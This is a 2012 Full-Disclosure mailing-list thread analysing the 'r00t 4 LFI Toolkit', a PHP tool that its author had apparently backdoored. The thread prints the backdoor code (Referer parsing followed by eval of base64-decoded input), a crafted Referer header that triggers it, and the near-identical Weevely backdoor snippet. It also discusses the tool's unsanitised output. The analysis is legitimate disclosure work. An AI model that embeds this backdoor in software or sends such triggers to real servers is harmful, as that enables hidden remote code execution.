Re: Analysis of the "r00t 4 LFI Toolkit"

[Benji <me () b3nji com>]

A priv8 php shell, funniest thing I've ever heard on this list.

On Mon, Feb 20, 2012 at 1:37 PM, Gage Bystrom <themadichib0d () gmail com>wrote:

> Uhh no, you misread what he said. He's saying he's seen that code in a few
> php shells that were supposedly meant to be private but the authors were
> miserable failures and he found the code anyways, not that he wrote it.
> On Feb 20, 2012 12:36 AM, "Manu" <sourvivor () gmail com> wrote:
>
> > But you saw it in a few """priv8""" php shells? And you say that is your
> > code as 'r00t 4 LFI toolkit' ? Pathetic
> >
> >
> > 2012/2/19 InterN0T Advisories <advisories () intern0t net>
> >
> > > Thank you for the response, I didn't know it was included in the Weevely
> > > tool, but I did see it used in a few "priv8" PHP shells too.
> > >
> > > On Sun, 19 Feb 2012 19:32:13 +0200, Anestis Bechtsoudis
> > > <bechtsoudis.a () gmail com> wrote:
> > > > The backdoor PHP code that you included is exactly the same as
> > > generated
> > > > by Weevely [1] tool, until the 0.4 version of the tool.
> > > >
> > > > For convenience I include the base64 decoded Weevely code here too:
> > > >
> > > > ini_set('error_log','/dev/null');
> > > > parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='my' &&
> > > > count($a)==9) {echo '<pass>';eval(base64_decode(str_replace(" ", "+",
> > > > join(array_slice($a,count($a)-3)))));echo '</pass>';}
> > > >
> > > >
> > > > For more details you can refer at a relevant post I wrote recently [2].
> > > >
> > > > I haven't dig into "r00t 4 LFI" source code, but from your analysis the
> > > > similarities are pretty obvious.
> > > >
> > > > ps: This email has been BCC'ed to Weevely developer.
> > > >
> > > >
> > > > [1] http://code.google.com/p/weevely/
> > > > [2]
> > > https://bechtsoudis.com/security/put-weevely-on-the-your-nids-radar/
> > > > On 02/19/2012 07:01 PM, InterN0T Advisories wrote:
> > > > > Dear Full Disclosure readers,
> > > > >
> > > > >
> > > > > Today I saw Joe McCray among others, tweet about the (new) "r00t 4 LFI
> > > > > Toolkit", that according to its description:
> > > > > -------------------------------------------
> > > > > This tool is a php script that assists in performing local file
> > > inclusion
> > > > > attacks.
> > > > > -------------------------------------------
> > > > >
> > > > > > > Should be able to perform local file inclusion attacks.
> > > > >
> > > > >
> > > > > -:: Overview ::-
> > > > >
> > > > > After studying this tool for a brief 5 minutes, it was obvious that it
> > > > > was
> > > > > nowhere what I hoped it to be, as the tool only use one method, the
> > > > > "/proc/self/environ" vector (as seen on e.g., the intern0t forums and
> > > > > many
> > > > > other sites).
> > > > >
> > > > > The tool is therefore, not capable of performing "attacks", but only
> > > 1,
> > > > > single type of LFI attack. (Note that the 'S' has been removed.)
> > > > >
> > > > > The method this tool uses, is far from new and doesn't always work
> > > > > either,
> > > > > but it's a nice trick that e.g., SirGod wrote about on the intern0t
> > > > > forums
> > > > > in 2009. (This tool was released the 18th February 2012.)
> > > > >
> > > > >
> > > > > -:: Vulnerabilities ::-
> > > > >
> > > > > Further study of this tool reveals:
> > > > > - None of the output from the tool is sanitized, meaning the attacker
> > > > > using the script, can get XSS'd (and CSRF'd), if the target has
> > > changed
> > > > > e.g., the 'uname -a' command (which is relatively simple to do), to
> > > > > include
> > > > > (print) JavaScript instead. If this happens, the attacker may end up
> > > > > attacking himself, crashing or something third, depending on the type
> > > of
> > > > > XSS payload.
> > > > >
> > > > > - The most interesting part, is on line 92, where the "developer"
> > > > > (KedAns-Dz), has decided to >>backdoor<< the tool.
> > > > >
> > > > >
> > > > > -:: The Backdoor ::-
> > > > >
> > > > > Analysis of the backdoor:
> > > > > By sending a HTTP request, that includes a specially crafted referer,
> > > it
> > > > > is possible to execute PHP code:
> > > > > -------------------------------------------
> > > > > Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw==
> > > > > -------------------------------------------
> > > > >
> > > > >
> > > > > This referer will make the script execute: phpinfo();
> > > > >
> > > > >
> > > > > -:: Code Review ::-
> > > > >
> > > > > The code that enables the developer to use the script as a backdoor
> > > looks
> > > > > like the following:
> > > > > -------------------------------------------
> > > > > parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' &&
> > > > > count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+",
> > > > > join(array_slice($a,count($a)-3)))));echo '</star>';}
> > > > > -------------------------------------------
> > > > >
> > > > >
> > > > > It certainly took a little bit of study to trigger, but in essence
> > > here's
> > > > > what it do:
> > > > > 1. Parse the HTTP Referer string into variable: $a ("Referer:" is not
> > > > > included.)
> > > > > 2. If the first array value (not key / arg), is a string named: iz
> > > > > 3. And if there's 9 (different) arrays, then
> > > > > 4. Print out the contents of..
> > > > >
> > > > >
> > > > > This requires a bit more in-depth explanation:
> > > > > A) Evaluate the following as PHP code:
> > > > > B) Base64_decode the input:
> > > > > C) Replace " " (space) with "+" (plus), in case they occur.
> > > > > D) Use the last three array values from the HTTP referer.
> > > > > (You don't have to use all three, using the last will work fine.)
> > > > >
> > > > >
> > > > > To make it all a lot more simple:
> > > > > -------------------------------------------
> > >
> > > Referer:Array1=iz&Array2=&Array3=&Array4=&Array5=&Array6=&Array7=&Array8=&Array0=[BASE64
> > > > > Code that will be executed as PHP.]
> > > > > -------------------------------------------
> > > > >
> > > > >
> > > > > Screenshot:
> > > > > http://i.imgur.com/PXcSX.png
> > > > >
> > > > >
> > > > > References:
> > >
> > > http://forum.intern0t.org/offensive-guides-information/4113-analysis-r00t-4-local-file-inclusion-toolkit.html
> > > > >
> > >
> > > http://forum.intern0t.org/general-hacking-discussions/1258-shell-via-local-file-inclusion-proc-self-environ-method-step-step.html
> > > > > http://packetstormsecurity.org/files/109940/
> > > > > https://twitter.com/#!/j0emccray/status/170941195030233090
> > > > > https://twitter.com/#!/EChavarro/status/170941489629761537
> > > > > http://i.imgur.com/PXcSX.png
> > > > >
> > > > >
> > > > >
> > > > > Best regards,
> > > > > MaXe
> > > > >
> > > > > _______________________________________________
> > > > > Full-Disclosure - We believe in it.
> > > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
> > --
> > /Manu~
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/